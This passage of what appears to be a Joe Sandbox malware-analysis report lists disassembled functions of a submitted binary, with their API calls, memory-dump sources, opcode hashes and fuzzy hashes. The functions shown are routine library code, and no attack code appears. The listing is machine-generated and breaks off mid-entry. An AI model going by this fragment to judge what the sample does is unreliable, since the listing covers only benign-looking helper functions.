                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExecutionStateThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2211380416-0
                                                                                                                    • Opcode ID: d89b00f1861cc41de1a70ff7c7cef1c060e3d5f7bb6d5891dd55b7f751b7d457
                                                                                                                    • Instruction ID: 0bbe351321c984b683e51cf1c9074e05eca17ef8a1a5cd1fee48999b437c8669
                                                                                                                    • Opcode Fuzzy Hash: d89b00f1861cc41de1a70ff7c7cef1c060e3d5f7bb6d5891dd55b7f751b7d457
                                                                                                                    • Instruction Fuzzy Hash: ADD01211A150555ADE11372C6955BFE26C7CFCB311F0D08F5B14567193CE544886A361
                                                                                                                    Function 00B9A626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 00B9A62C
                                                                                                                      • Part of subcall function 00B9A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B9A3DA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1915507550-0
                                                                                                                    • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                    • Instruction ID: 6f6936d02a0c74ab02a55c4b7bbec039decf211e6489bdbe37c83afbf200a1da
                                                                                                                    • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                                                                                    • Instruction Fuzzy Hash: B3D0C971214209BADF42AF728C5297E7ADAEB01340F0481B5B842D5191EAB1E910A6A6
                                                                                                                    Function 00B9E5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DloadProtectSection.DELAYIMP ref: 00B9E5E3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DloadProtectSection
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2203082970-0
                                                                                                                    • Opcode ID: b8df1e44eca60a4e7260f93ce0088715cdf2f51febb005d39468f6f6ffbcf961
                                                                                                                    • Instruction ID: a71590ed2e4e1b60495ed203ac0aace16d287bb4f103ca34cfe73372146779f8
                                                                                                                    • Opcode Fuzzy Hash: b8df1e44eca60a4e7260f93ce0088715cdf2f51febb005d39468f6f6ffbcf961
                                                                                                                    • Instruction Fuzzy Hash: FED0C9B0580280ABDE12EBACA8C672437D4F324B04FB009E5F165DA6A5DFB4C490C606
                                                                                                                    Function 00B9DD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00B91B3E), ref: 00B9DD92
                                                                                                                      • Part of subcall function 00B9B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B9B579
                                                                                                                      • Part of subcall function 00B9B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B9B58A
                                                                                                                      • Part of subcall function 00B9B568: IsDialogMessageW.USER32(0001040E,?), ref: 00B9B59E
                                                                                                                      • Part of subcall function 00B9B568: TranslateMessage.USER32(?), ref: 00B9B5AC
                                                                                                                      • Part of subcall function 00B9B568: DispatchMessageW.USER32(?), ref: 00B9B5B6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 897784432-0
                                                                                                                    • Opcode ID: e5a8bf137fb03a967e1664654e3ce72a90932ec27d552018f26c1f1732a469dc
                                                                                                                    • Instruction ID: 95953b84d048ce8ba3972e1d96878f3bc383859c40364091652487b927702fa6
                                                                                                                    • Opcode Fuzzy Hash: e5a8bf137fb03a967e1664654e3ce72a90932ec27d552018f26c1f1732a469dc
                                                                                                                    • Instruction Fuzzy Hash: 14D09E31154300BADA012B51DE06F1A7AE2AB98B08F004599B284750B18A729D61DB12
                                                                                                                    Function 00B898BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetFileType.KERNELBASE(000000FF,00B897BE), ref: 00B898C8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileType
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3081899298-0
                                                                                                                    • Opcode ID: 877b0e2fa963ddaf5dfa31d20e1928376c4ad6010dcb50ea23370b13aeb1eab5
                                                                                                                    • Instruction ID: 3a691f7c31c0c9b4755bd93a66a0c8c700ed61d6005d81359d903bb2093eda97
                                                                                                                    • Opcode Fuzzy Hash: 877b0e2fa963ddaf5dfa31d20e1928376c4ad6010dcb50ea23370b13aeb1eab5
                                                                                                                    • Instruction Fuzzy Hash: F3C00234404206968E61AA2498490A977A2EF637EA7B897D4D0798A0F1C722CC97EB11
                                                                                                                    Function 00B9E1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: c1b661f9a7fe65d06a8a30b8b4aaaec715d8cb056975e153084f0c0ffb4113ee
                                                                                                                    • Instruction ID: d0913e2093c7a0109932b620099cd5e43f33d29b30f96d5ac48e543084eda88a
                                                                                                                    • Opcode Fuzzy Hash: c1b661f9a7fe65d06a8a30b8b4aaaec715d8cb056975e153084f0c0ffb4113ee
                                                                                                                    • Instruction Fuzzy Hash: A1B012D2268041BD3504D2461C47D3701CCC0C1F10330C0FEFC25D51C0ED80EC840432
                                                                                                                    Function 00B9E1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 3473a02209464e0891e9eabbc2ae8b8daff3cb61cae5f8a616d8434d9fa610cc
                                                                                                                    • Instruction ID: 88f2dceba4bcf489dfdbcb65d0eb264565c35d1960ece481d41c0483ea4cd22b
                                                                                                                    • Opcode Fuzzy Hash: 3473a02209464e0891e9eabbc2ae8b8daff3cb61cae5f8a616d8434d9fa610cc
                                                                                                                    • Instruction Fuzzy Hash: BCB012D626C141ED3504D18A1C87D3701CCD0C0F1033040FEF825D5080ED80ECC00532
                                                                                                                    Function 00B9E1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 110171e1c11e28dc86a02d9145586f590787bd52d8dcdd8a1b33597f5dd85c53
                                                                                                                    • Instruction ID: 185458e01b028f0e6b0bd6e45615440073b87f65520ed036a04165047e64a725
                                                                                                                    • Opcode Fuzzy Hash: 110171e1c11e28dc86a02d9145586f590787bd52d8dcdd8a1b33597f5dd85c53
                                                                                                                    • Instruction Fuzzy Hash: 6EB012D6268141BD3504D1861C87C3701CCC0C1F1033084FEFC21E4480ED80ECC00432
                                                                                                                    Function 00B9E282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 203f9862d6e9b55898760cccf9845cf6f2f011dc3ac60b48d409110b9f23d9e8
                                                                                                                    • Instruction ID: b6f8ae114a5858447f4e854148e979ac0e5df5c43a3d0cf8f6ed4116650df15b
                                                                                                                    • Opcode Fuzzy Hash: 203f9862d6e9b55898760cccf9845cf6f2f011dc3ac60b48d409110b9f23d9e8
                                                                                                                    • Instruction Fuzzy Hash: ADB012E2268041ED3504D1461D87D3701CCC0C0F1033040FEF825D5080ED80ED811432
                                                                                                                    Function 00B9EAE7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9EAF9
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 8d474d2118d45c6c68409a37ae79da7bbc2484cf1fd0ef1fed8f4e659482d52d
                                                                                                                    • Instruction ID: 041744f93b38e0e1f7b9217d8640cc9dc96d0e1231a39d769d6345d96705a0e3
                                                                                                                    • Opcode Fuzzy Hash: 8d474d2118d45c6c68409a37ae79da7bbc2484cf1fd0ef1fed8f4e659482d52d
                                                                                                                    • Instruction Fuzzy Hash: E2B012C72AA0827D3904E2411D86D3703CCC0D0FA133084FEF421C90A3FCC08C010431
                                                                                                                    Function 00B9E23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 2b9fa10246f2bab73d22f23de1aba63a226f27b7f9137c97853f87530185fb2c
                                                                                                                    • Instruction ID: d4f123ae6e688643916a586d465f15077c76f402b0431c4a22d46f51507dfd2e
                                                                                                                    • Opcode Fuzzy Hash: 2b9fa10246f2bab73d22f23de1aba63a226f27b7f9137c97853f87530185fb2c
                                                                                                                    • Instruction Fuzzy Hash: EBB012F2268041AD3544D1471C47D3701CCD0C0F1033040FEF825D5080ED80ED800432
                                                                                                                    Function 00B9E232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 32fa2f9b10d4332800d21b731b3f24fcbc1014fea1f9ab69458bac0380ab5058
                                                                                                                    • Instruction ID: 888b68b3ce09f1deb2c8ed74ddfa4ae7f03b4d54a4fe191e436dd1cf4078b996
                                                                                                                    • Opcode Fuzzy Hash: 32fa2f9b10d4332800d21b731b3f24fcbc1014fea1f9ab69458bac0380ab5058
                                                                                                                    • Instruction Fuzzy Hash: 79B012F2268041AD3544D1461D47D3701CDC0C0F1033040FEF825D5080ED80EE810432
                                                                                                                    Function 00B9E228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: 18cad6ce061a0ca7964cd2d964f6a5ada1d20935665b7f3cd37a7dfd56334791
                                                                                                                    • Instruction ID: 78dc3232783fb6c5c06c5bec60bf3e7f3141c5a62021982058fbf2b24d7818b7
                                                                                                                    • Opcode Fuzzy Hash: 18cad6ce061a0ca7964cd2d964f6a5ada1d20935665b7f3cd37a7dfd56334791
                                                                                                                    • Instruction Fuzzy Hash: 45B012F2268141BD3584D1461C47D3701CCC0C0F1033041FEF825D5080ED80EDC00432
                                                                                                                    Function 00B9E21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B9E1E3
                                                                                                                      • Part of subcall function 00B9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9E8D0
                                                                                                                      • Part of subcall function 00B9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9E8E1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2115855430.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2115837421.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115880933.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2115900272.0000000000BE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2116015717.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_b80000_eP6sjvTqJa.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-0
                                                                                                                    • Opcode ID: ed75a50625248003a832f1e0cb51555a490a4dc4e6f71306d82424c5e7a0346f
                                                                                                                    • Instruction ID: e4d79edcea298fe1a720397e469c62e61e65c3ae275ad13b60d73ce600e940a3
                                                                                                                    • Opcode Fuzzy Hash: ed75a50625248003a832f1e0cb51555a490a4dc4e6f71306d82424c5e7a0346f
